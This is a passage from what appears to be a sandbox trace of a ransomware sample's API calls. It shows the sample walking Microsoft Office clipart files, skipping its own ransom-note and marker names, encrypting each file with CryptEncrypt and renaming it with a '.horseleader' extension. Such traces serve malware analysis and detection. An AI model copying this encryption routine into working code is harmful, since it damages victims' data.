nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x79c, lpOverlapped=0x0) returned 1 [0253.937] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff864, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x79c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x79c, lpOverlapped=0x0) returned 1 [0253.937] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.937] CloseHandle (hObject=0x158) returned 1 [0253.937] GetProcessHeap () returned 0x780000 [0253.937] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.horseleader") returned 79 [0253.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.horseleader")) returned 1 [0253.938] GetProcessHeap () returned 0x780000 [0253.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.938] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ecd00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba4ecd00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00419_.WMF", cAlternateFileName="")) returned 1 [0253.938] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="Windows") returned -1 [0253.938] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0253.938] StrStrIW (lpFirst="DD00419_.WMF", lpSrch=".horseleader") returned 0x0 [0253.938] lstrcmpW (lpString1="DD00419_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.938] lstrcmpW (lpString1="DD00419_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.938] lstrlenW (lpString=".testttjffg") returned 11 [0253.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 67 [0253.939] StrStrW (lpFirst="DD00419_.WMF", lpSrch=".txt") returned 0x0 [0253.939] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=712) returned 1 [0253.939] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2c8, lpOverlapped=0x0) returned 1 [0253.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2c8, lpOverlapped=0x0) returned 1 [0253.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.940] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.940] CloseHandle (hObject=0x158) returned 1 [0253.940] GetProcessHeap () returned 0x780000 [0253.940] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.941] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.horseleader") returned 79 [0253.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.horseleader")) returned 1 [0253.945] GetProcessHeap () returned 0x780000 [0253.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91da000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb91da000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x78c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00437_.WMF", cAlternateFileName="")) returned 1 [0253.945] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="Windows") returned -1 [0253.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0253.945] StrStrIW (lpFirst="DD00437_.WMF", lpSrch=".horseleader") returned 0x0 [0253.945] lstrcmpW (lpString1="DD00437_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.945] lstrcmpW (lpString1="DD00437_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.945] lstrlenW (lpString=".testttjffg") returned 11 [0253.945] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 67 [0253.946] StrStrW (lpFirst="DD00437_.WMF", lpSrch=".txt") returned 0x0 [0253.946] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1932) returned 1 [0253.946] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x78c, lpOverlapped=0x0) returned 1 [0253.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff874, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x78c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x78c, lpOverlapped=0x0) returned 1 [0253.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.948] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.948] CloseHandle (hObject=0x158) returned 1 [0253.948] GetProcessHeap () returned 0x780000 [0253.948] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.948] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.horseleader") returned 79 [0253.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.horseleader")) returned 1 [0253.949] GetProcessHeap () returned 0x780000 [0253.949] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.949] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb88, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00448_.WMF", cAlternateFileName="")) returned 1 [0253.949] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="Windows") returned -1 [0253.949] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0253.949] StrStrIW (lpFirst="DD00448_.WMF", lpSrch=".horseleader") returned 0x0 [0253.949] lstrcmpW (lpString1="DD00448_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.950] lstrcmpW (lpString1="DD00448_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.950] lstrlenW (lpString=".testttjffg") returned 11 [0253.950] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.950] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.950] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 67 [0253.951] StrStrW (lpFirst="DD00448_.WMF", lpSrch=".txt") returned 0x0 [0253.951] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2952) returned 1 [0253.951] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb88, lpOverlapped=0x0) returned 1 [0253.953] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff478, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb88, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb88, lpOverlapped=0x0) returned 1 [0253.953] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.953] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.953] CloseHandle (hObject=0x158) returned 1 [0253.953] GetProcessHeap () returned 0x780000 [0253.953] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.953] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.horseleader") returned 79 [0253.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.horseleader")) returned 1 [0253.954] GetProcessHeap () returned 0x780000 [0253.954] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.954] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2708, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00449_.WMF", cAlternateFileName="")) returned 1 [0253.954] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="Windows") returned -1 [0253.954] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0253.954] StrStrIW (lpFirst="DD00449_.WMF", lpSrch=".horseleader") returned 0x0 [0253.954] lstrcmpW (lpString1="DD00449_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.954] lstrcmpW (lpString1="DD00449_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.954] lstrlenW (lpString=".testttjffg") returned 11 [0253.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.954] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.955] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 67 [0253.955] StrStrW (lpFirst="DD00449_.WMF", lpSrch=".txt") returned 0x0 [0253.955] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9992) returned 1 [0253.955] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2708, lpOverlapped=0x0) returned 1 [0253.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2708, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2708, lpOverlapped=0x0) returned 1 [0253.971] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.971] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.971] CloseHandle (hObject=0x158) returned 1 [0253.971] GetProcessHeap () returned 0x780000 [0253.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.971] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.horseleader") returned 79 [0253.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.horseleader")) returned 1 [0253.972] GetProcessHeap () returned 0x780000 [0253.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.973] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac04fe00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac04fe00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00687_.WMF", cAlternateFileName="")) returned 1 [0253.973] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="Windows") returned -1 [0253.973] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0253.973] StrStrIW (lpFirst="DD00687_.WMF", lpSrch=".horseleader") returned 0x0 [0253.973] lstrcmpW (lpString1="DD00687_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.973] lstrcmpW (lpString1="DD00687_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.973] lstrlenW (lpString=".testttjffg") returned 11 [0253.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.974] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 67 [0253.974] StrStrW (lpFirst="DD00687_.WMF", lpSrch=".txt") returned 0x0 [0253.974] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20784) returned 1 [0253.974] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.978] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x130, lpOverlapped=0x0) returned 1 [0253.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x130, lpOverlapped=0x0) returned 1 [0253.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.978] CloseHandle (hObject=0x158) returned 1 [0253.979] GetProcessHeap () returned 0x780000 [0253.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.979] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.horseleader") returned 79 [0253.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 